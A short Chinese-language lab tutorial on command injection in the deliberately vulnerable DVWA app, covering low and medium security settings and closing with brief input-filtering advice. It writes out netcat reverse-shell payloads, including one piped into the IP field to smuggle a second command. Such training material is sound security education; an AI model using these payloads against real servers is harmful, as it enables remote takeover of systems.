Dvwa漏洞之代码执行漏洞

目录

代码执行漏洞的危害 code execution

看个例子：security 为low

当security 为medium时

如何规避此类问题

---

代码执行漏洞的危害 code execution

• 允许攻击者执行操作系统命令
• windows or linux
• 可以用来得到一个反向shell
• 或者使用wget上传文件

看个例子：security 为low

正常输入ip 用来执行ping，但是可以加个pwd，就把路径显示出来了，从而获取了目标服务器的pwd信息工作目录。就是说可以执行任何命令，很多命令可以获取反向连接

例如可以输入以下命令，在攻击服务器上就可以获取目标机器的所有权限

nc -e /bin/sh 10.0.2.15 8080

当security 为medium时

以上不再有空，此时考虑通过管道的方式。此时不执行ping xxx，只执行了pwd

 同样的，可以通过构造以下命令，来获得目标服务器的访问权限

10.0.2.15 |nc -e /bin/bash 10.0.2.15 8080

如何规避此类问题

以上，我们看到 利用此类漏洞，攻击者可以在目标服务器上执行命令。

1. 不使用危险的功能

2. 在执行前过滤用户输入。我们希望用户只输入ip，不希望输入其他命令，那么可以考虑用正则表达式去检查。

来看下在security 为high模式下的代码。做了输入检查

 以上！